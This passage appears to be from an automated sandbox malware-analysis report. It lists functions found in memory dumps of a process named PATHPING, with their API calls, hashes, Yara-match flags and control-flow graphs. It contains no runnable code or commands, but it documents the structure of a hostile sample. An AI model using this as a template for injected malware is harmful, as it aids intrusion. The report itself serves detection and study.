                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 002574b65368dba7efe7c439d55d73d034a67e72409182588c01dc0d10e2adcb
                                                                                                                                • Instruction ID: 148a9189e548b72e1f77511eaf4cc3e877549230e33f8af7fb5b898b63c52b05
                                                                                                                                • Opcode Fuzzy Hash: 002574b65368dba7efe7c439d55d73d034a67e72409182588c01dc0d10e2adcb
                                                                                                                                • Instruction Fuzzy Hash: 1090023120549802D2107158840574B000587E0305F59C411A4428778D8A958D957131
                                                                                                                                Function 02D12C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 16f8919f3fc5879f60252d24e00db68bb5b7ef575fabb1a7b2227c82e3b3981a
                                                                                                                                • Instruction ID: b2bce1515d82ad6e20c470efb596e66e3fbfb39db263380209f116fab2e0dd3f
                                                                                                                                • Opcode Fuzzy Hash: 16f8919f3fc5879f60252d24e00db68bb5b7ef575fabb1a7b2227c82e3b3981a
                                                                                                                                • Instruction Fuzzy Hash: 5790023120541842D20071584405B47000587F0305F55C016A0128774D8A15CD557531
                                                                                                                                Function 02D12DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 6e8d8483546aff3fe95a65f7db3c69ccfac0be45ef1ac07204a34ef5647c7f79
                                                                                                                                • Instruction ID: 716261b5a8422deb7ea30db57498f69d0ec71adbfb8be57a003b78ae35be1ac6
                                                                                                                                • Opcode Fuzzy Hash: 6e8d8483546aff3fe95a65f7db3c69ccfac0be45ef1ac07204a34ef5647c7f79
                                                                                                                                • Instruction Fuzzy Hash: AB900221246451525645B1584405507400697F0245795C012A1418A70C89269D5AE631
                                                                                                                                Function 02D12DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 97746f27eb874a90a5a16f1cec0fd6a66f6256c7e823d8f9ae5d1604c3216520
                                                                                                                                • Instruction ID: 2fe6104bd114e98315967e25fc4deef551eeab56323f157fb4c0d99d226de057
                                                                                                                                • Opcode Fuzzy Hash: 97746f27eb874a90a5a16f1cec0fd6a66f6256c7e823d8f9ae5d1604c3216520
                                                                                                                                • Instruction Fuzzy Hash: F990023120541413D21171584505707000987E0245F95C412A0428678D9A568E56B131
                                                                                                                                Function 02D12D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: e0ed288a17f58bd30100a8b3ac8bb1c68de2df50df054e4b03672ef083c53b6c
                                                                                                                                • Instruction ID: 3b1c96d467f818a610a92726576bd18e800a35e317f695a025a4f1c3a0f39c27
                                                                                                                                • Opcode Fuzzy Hash: e0ed288a17f58bd30100a8b3ac8bb1c68de2df50df054e4b03672ef083c53b6c
                                                                                                                                • Instruction Fuzzy Hash: C690022921741002D2807158540960B000587E1206F95D415A0019678CCD158D6D6331
                                                                                                                                Function 02D12D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: eca3439cad0416f4fcbdf9b1ce62db60a64d09347df1ed1acbdc4f4218a4e4f5
                                                                                                                                • Instruction ID: 4fe231a813851d6e8a07c48a2609d21a3017b32fd93a315500a04243ac2965f9
                                                                                                                                • Opcode Fuzzy Hash: eca3439cad0416f4fcbdf9b1ce62db60a64d09347df1ed1acbdc4f4218a4e4f5
                                                                                                                                • Instruction Fuzzy Hash: 0E90022130541003D240715854196074005D7F1305F55D011E0418674CDD158D5A6232
                                                                                                                                Function 02D135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: b4428ac601cadfbcfe0647a291436eea30528cf6e89b3bcf792a0dda99daf2ca
                                                                                                                                • Instruction ID: 6b1254f6eaccc3a127ea91478a477a2487c8a2bb211cd98518708e748405ce00
                                                                                                                                • Opcode Fuzzy Hash: b4428ac601cadfbcfe0647a291436eea30528cf6e89b3bcf792a0dda99daf2ca
                                                                                                                                • Instruction Fuzzy Hash: FB90023160951402D20071584515707100587E0205F65C411A0428678D8B958E5575B2
                                                                                                                                Function 02D139B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 822d1fb9f7cb9b4e16c74ee91facd78be6036a28d31af0cbc5a78556df1d84fe
                                                                                                                                • Instruction ID: 0c9bc7debb5b7e4e1ec2798e2e33b3ec417c36000acddda04f9f2889e6c26c8d
                                                                                                                                • Opcode Fuzzy Hash: 822d1fb9f7cb9b4e16c74ee91facd78be6036a28d31af0cbc5a78556df1d84fe
                                                                                                                                • Instruction Fuzzy Hash: BD90022124946102D250715C44056174005A7F0205F55C021A08186B4D89558D597231
                                                                                                                                Function 00410810 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 183COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 301 410810-41082b 304 4107bb-4107c5 301->304 305 41082d-41083c 301->305 308 4107c7-4107dc call 4103c0 304->308 309 4107de-4107f2 call 410450 304->309 306 4107f3 305->306 307 41083e-410843 305->307 310 4108b2 307->310 311 4108b6-4108c1 307->311 308->309 319 410760-41079a call 42b050 call 42b660 call 421730 308->319 309->306 310->311 314 4108c3-4108d3 311->314 314->310 318 4108d5-4108fe 314->318 318->314 321 410900-410923 318->321 319->308 335 41079c-4107a2 319->335 325 410925-41093a 321->325 326 410999 321->326 328 4109b2-410a1a call 42b0a0 call 42bab0 call 4140f0 call 401410 call 421790 325->328 329 41093c-41093d 325->329 326->328 351 410a3a-410a40 328->351 352 410a1c-410a2b PostThreadMessageW 328->352 337 4107f4-4107f7 335->337 338 4107a4-4107c5 call 424d70 335->338 337->308 339 4107f9-41080d call 426830 337->339 338->308 338->309 339->308 352->351 353 410a2d-410a37 352->353 353->351
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 6276$6276I39$6276I39$I39
                                                                                                                                • API String ID: 0-1925500867
                                                                                                                                • Opcode ID: 21a8906d28afc49824afa18c601eafe4830de5cd4ffd640c606c7b2adf2aecd3
                                                                                                                                • Instruction ID: b847c43ee7c2bcce045d12a16670b214c68b84230fb8e870f8c8ffe74ad1cfaf
                                                                                                                                • Opcode Fuzzy Hash: 21a8906d28afc49824afa18c601eafe4830de5cd4ffd640c606c7b2adf2aecd3
                                                                                                                                • Instruction Fuzzy Hash: FD511E7290021D7FDB11AA648C419EFBBBCEF81368F04866AF800A7141D7695D86CBD9
                                                                                                                                Function 0041093F Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 108threadwindowCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 383 41093f-41095c 384 410916-410923 383->384 385 41095e-410969 383->385 388 410925-41093a 384->388 389 410999 384->389 386 41096b-410998 385->386 387 4109bd-410a1a call 42b0a0 call 42bab0 call 4140f0 call 401410 call 421790 385->387 386->389 402 410a3a-410a40 387->402 403 410a1c-410a2b PostThreadMessageW 387->403 391 4109b2-4109bb 388->391 392 41093c-41093d 388->392 389->391 391->387 403->402 404 410a2d-410a37 403->404 404->402
                                                                                                                                APIs
                                                                                                                                • PostThreadMessageW.USER32(36373236,00000111,00000000,00000000), ref: 00410A27
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostThread
                                                                                                                                • String ID: 6276$6276I39$6276I39$I39
                                                                                                                                • API String ID: 1836367815-1925500867
                                                                                                                                • Opcode ID: 6ef0edf071b7ee54144f16f609fc9f346e420deed3876b7cdd17c4a4ddb161fe
                                                                                                                                • Instruction ID: 427c85081ad36f8c7c53bdc1822b8f0277954a912e1e9715cc7c0dd23f87546f
                                                                                                                                • Opcode Fuzzy Hash: 6ef0edf071b7ee54144f16f609fc9f346e420deed3876b7cdd17c4a4ddb161fe
                                                                                                                                • Instruction Fuzzy Hash: 4231FE72E543487FEF21CAA54C51DEF3BACDEA5364B00845AF510AB241D76C8D4387E6
                                                                                                                                Function 004109B0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 60threadwindowCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 405 4109b0-410a1a call 42b0a0 call 42bab0 call 4140f0 call 401410 call 421790 417 410a3a-410a40 405->417 418 410a1c-410a2b PostThreadMessageW 405->418 418->417 419 410a2d-410a37 418->419 419->417
                                                                                                                                APIs
                                                                                                                                • PostThreadMessageW.USER32(36373236,00000111,00000000,00000000), ref: 00410A27
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostThread
                                                                                                                                • String ID: 6276$6276I39$6276I39$I39
                                                                                                                                • API String ID: 1836367815-1925500867
                                                                                                                                • Opcode ID: 484300885e35b065d1096965fd2e9791678065f8507569ebba2a1c1d5c9236e4
                                                                                                                                • Instruction ID: 0f6722a2238d94f06cb47184848a6fcad7e741c16efdbcb73104cc78658ecbc6
                                                                                                                                • Opcode Fuzzy Hash: 484300885e35b065d1096965fd2e9791678065f8507569ebba2a1c1d5c9236e4
                                                                                                                                • Instruction Fuzzy Hash: 1901D6B1D4021C7AEB11AAE28C82DEF7B7CDF54798F408069FA14B7241E6785E0687F5
                                                                                                                                Function 00409D6A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00409DB5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateThread
                                                                                                                                • String ID: uAs$f_
                                                                                                                                • API String ID: 2422867632-1128715547
                                                                                                                                • Opcode ID: 5b8b3e83f1bbceda610b3538e20ba1c261a067cd2e3220a8a485e1b2ed340afa
                                                                                                                                • Instruction ID: 526c3ddfb7f1d9dbfa4302d2da5cd07acfe9038140e984a4955d8af2f9f960e5
                                                                                                                                • Opcode Fuzzy Hash: 5b8b3e83f1bbceda610b3538e20ba1c261a067cd2e3220a8a485e1b2ed340afa
                                                                                                                                • Instruction Fuzzy Hash: C9114C72A4121876D7206A999C03FDFBBACDF45714F10005AFA08BB2C3D6B46A4087FD
                                                                                                                                Function 0041F059 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                • String ID: @J7<
                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                • Opcode ID: ee137f8af73b714ff82a3c3f103a93c57b3885613019e9ecebcd0318820593e7
                                                                                                                                • Instruction ID: a21e7d6368e5cc4e77bc437895d1c54d69afb0f8e031e1167e3a91d3e8b6c893
                                                                                                                                • Opcode Fuzzy Hash: ee137f8af73b714ff82a3c3f103a93c57b3885613019e9ecebcd0318820593e7
                                                                                                                                • Instruction Fuzzy Hash: 6B4150B6A0020AAFDB00DF98DC80DEFB7B9FF88304B108559E519A7204D735AE458BA0
                                                                                                                                Function 00423600 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 004236DB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                • Opcode ID: e96dd343ef8b728e9e0c32913d2255afa7d4da6fd0ba558f25344eefa1415e1c
                                                                                                                                • Instruction ID: d8af562ef4f252f2d548fa16d7ce54ddb508fffe9061d59a484ecb063b7b195f
                                                                                                                                • Opcode Fuzzy Hash: e96dd343ef8b728e9e0c32913d2255afa7d4da6fd0ba558f25344eefa1415e1c
                                                                                                                                • Instruction Fuzzy Hash: 7931B2B1A01605BBD714DF65DC81FEBBBB8FF88304F40851DF6196B241D7786A408BA4
                                                                                                                                Function 0041F060 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                • String ID: @J7<
                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                • Opcode ID: 86ccc4ffd3b8d63c553daf1c153f87be6e1111b87c16f24cefcf44685362f273
                                                                                                                                • Instruction ID: 97315adcde4d6af2727a2a3df21719932f93cf0ba11e88f2314217ae43a286d9
                                                                                                                                • Opcode Fuzzy Hash: 86ccc4ffd3b8d63c553daf1c153f87be6e1111b87c16f24cefcf44685362f273
                                                                                                                                • Instruction Fuzzy Hash: 94311EB5A0020AEFDB00DFD8D8809EFB7B9FF88304B108559E515AB314D775AE458BA4
                                                                                                                                Function 00414195 Relevance: 1.7, APIs: 1, Instructions: 169COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 97e9fc485e406106bfb65abad72d185b67487cc7268d4b5fcd9bf310d2ef2faa
                                                                                                                                • Instruction ID: c05a5d755b57d73c9dcfa94d4712535204775912863e989ea357a66d90085277
                                                                                                                                • Opcode Fuzzy Hash: 97e9fc485e406106bfb65abad72d185b67487cc7268d4b5fcd9bf310d2ef2faa
                                                                                                                                • Instruction Fuzzy Hash: A9418A71A40208AFDB11CEA4DC86FFA77B8EF55314F0442AAF9089B241EA34D591CBD5
                                                                                                                                Function 00417F3D Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4391f7d931df4bb7a7e398b9f73645a47c9e04c5ba706bc6840e833f387c2844
                                                                                                                                • Instruction ID: c37894517943673dc3caa1c050bb4e21cf5b37b1f19dd6ceb55d843322271971
                                                                                                                                • Opcode Fuzzy Hash: 4391f7d931df4bb7a7e398b9f73645a47c9e04c5ba706bc6840e833f387c2844
                                                                                                                                • Instruction Fuzzy Hash: E911BD3114A2414BC722AA38C8492D77BB4DF42364B180A8ED4E0CF7E3D32A895BC305
                                                                                                                                Function 004140E3 Relevance: 1.6, APIs: 1, Instructions: 52libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00414162
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                • Opcode ID: fec0760840a81a1cfc29dba25679e0d068e121a6b38d6e3e87c4cfae0b4f1189
                                                                                                                                • Instruction ID: f31c2c080f5e45d901e56a46d119c4480609334d7d858475bf29fbd2d1305dbb
                                                                                                                                • Opcode Fuzzy Hash: fec0760840a81a1cfc29dba25679e0d068e121a6b38d6e3e87c4cfae0b4f1189
                                                                                                                                • Instruction Fuzzy Hash: AF01D2B5E0010DA7DB10EBA4EC42FDEB7B89B54308F408296E91CA7241F234DA588781
                                                                                                                                Function 004140F0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00414162
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                • Opcode ID: 5b7e103240ded1459ada72a1c913c8d9925025acccbb9aa8914370982d61623b
                                                                                                                                • Instruction ID: 6449044bcac0f5d97adb5f1a0dba5be7eb8d45484ffe26064c4b49e5ca7301b4
                                                                                                                                • Opcode Fuzzy Hash: 5b7e103240ded1459ada72a1c913c8d9925025acccbb9aa8914370982d61623b
                                                                                                                                • Instruction Fuzzy Hash: 02015EB5E0020DBBDB10EBA1EC46FEEB3B89B54308F40419AED0897241F634EB54CB95
                                                                                                                                Function 00429340 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,00417E9E,00000010,?,?,?,00000044,?,00000010,00417E9E,?,?,?), ref: 004293A3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                • Opcode ID: 5c8074bed1560fbd93ead97a32b0684ce64102b7d9385dde0331ac63bc875bb8
                                                                                                                                • Instruction ID: 75f855d7a96b59cb4230c32825076dd081ad55d47c1e4248d2468f12168f6a5c
                                                                                                                                • Opcode Fuzzy Hash: 5c8074bed1560fbd93ead97a32b0684ce64102b7d9385dde0331ac63bc875bb8
                                                                                                                                • Instruction Fuzzy Hash: A801D2B2204208BBCB04DE89DC81EEB77ADAF8C714F40820DBA09E3241D634F851CBA4
                                                                                                                                Function 00409D70 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00409DB5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                • Opcode ID: 29ec8f44c87a5c2276cf537b4053dce362a942dfa3fde41dce95c11157800647
                                                                                                                                • Instruction ID: f7d10f4be15c77aebae68988938b7b54675357b7e9c2115df883a62d6dfc806f
                                                                                                                                • Opcode Fuzzy Hash: 29ec8f44c87a5c2276cf537b4053dce362a942dfa3fde41dce95c11157800647
                                                                                                                                • Instruction Fuzzy Hash: 19F0657339161476E22061AAAC02FDBB38C8FC0775F14042BF70CEB2C1D8A5B84142A9
                                                                                                                                Function 0041416C Relevance: 1.5, APIs: 1, Instructions: 31libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00414162
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
